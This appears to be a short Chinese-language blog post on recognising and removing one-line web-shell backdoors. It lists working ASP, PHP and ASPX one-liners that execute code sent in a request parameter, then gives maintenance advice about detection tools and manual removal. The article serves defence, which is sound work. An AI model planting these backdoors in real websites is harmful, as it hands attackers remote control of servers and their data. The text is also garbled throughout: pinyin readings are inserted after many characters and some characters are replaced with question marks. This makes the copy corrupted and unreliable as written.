一句話(huà)木馬的識(shí)別與防護(hù)
2016-01-19 17:01:36
18944
一句話(huà)木馬短小精悍,而且功能強(qiáng)大,隱蔽性非常好,在入侵中始終扮演著強(qiáng)大的作用。
所以作為網(wǎng)站日常的維護(hù),我們不得不小心這些一句話(huà)木馬。下面是一些常見(jiàn)的一句話(huà)
asp一句話(huà)木馬:
<%execute(request("value"))%>
php一句話(huà)木馬:
<?php @eval($_POST[value]);?>
aspx一句話(huà)木馬:
<%@ Page Language="Jscript"%>
<%eval(Request.Item["value"])%>
讓我們?cè)谌粘>S護(hù)中去注意這些木馬,總的來(lái)書(shū),我們需要一些工具的幫助,比如D盾
IIS防火墻,需要特別注意的是,謹(jǐn)慎使用他們的清理工具,因?yàn)檫@樣可能會(huì)導(dǎo)致誤殺
或者影響到網(wǎng)站的正常運(yùn)行以及數(shù)據(jù)庫(kù)的安全,作為網(wǎng)站的維護(hù)日常,平常應(yīng)該多多
總結(jié)經(jīng)驗(yàn),盡量手動(dòng)去刪除木馬,對(duì)插入了一句話(huà)的,我們只需要?jiǎng)h出這個(gè)代碼,而不
是將整個(gè)文件都刪除!
會(huì)員登錄
賬號(hào)登錄還沒(méi)有賬號(hào)?立即注冊(cè)